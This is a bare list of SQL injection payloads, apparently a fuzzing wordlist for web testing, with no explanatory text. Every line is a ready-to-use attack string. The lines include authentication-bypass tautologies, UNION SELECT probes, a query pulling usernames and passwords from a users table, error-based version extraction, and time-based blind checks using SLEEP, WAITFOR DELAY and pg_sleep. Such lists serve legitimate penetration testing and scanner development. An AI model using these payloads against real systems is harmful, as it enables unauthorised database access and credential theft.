' OR '1'='1
" OR "1"="1
' OR '1'='1'--
' OR '1'='1'/*
') OR ('1'='1
' OR 1=1--
" OR 1=1--
1' AND '1'='1
1' AND '1'='2
1 UNION SELECT NULL--
1 UNION SELECT NULL,NULL--
1 UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password FROM users--
1' ORDER BY 1--
1' ORDER BY 10--
' AND 1=CONVERT(int,(SELECT @@version))--
' AND extractvalue(1,concat(0x7e,(SELECT version())))--
' AND updatexml(1,concat(0x7e,(SELECT version())),1)--
' OR SLEEP(5)--
' OR SLEEP(5)#
1' AND (SELECT SLEEP(5))--
1' AND (SELECT SLEEP(5)) AND '1'='1
'; WAITFOR DELAY '0:0:5'--
1; WAITFOR DELAY '0:0:5'--
'; SELECT pg_sleep(5)--
1'; SELECT pg_sleep(5)--
' AND 1=(SELECT 1 FROM(SELECT SLEEP(5))a)--
1' AND pg_sleep(5) AND '1'='1
\
1' AND 1=1 UNION SELECT 1,2,3,4,5--
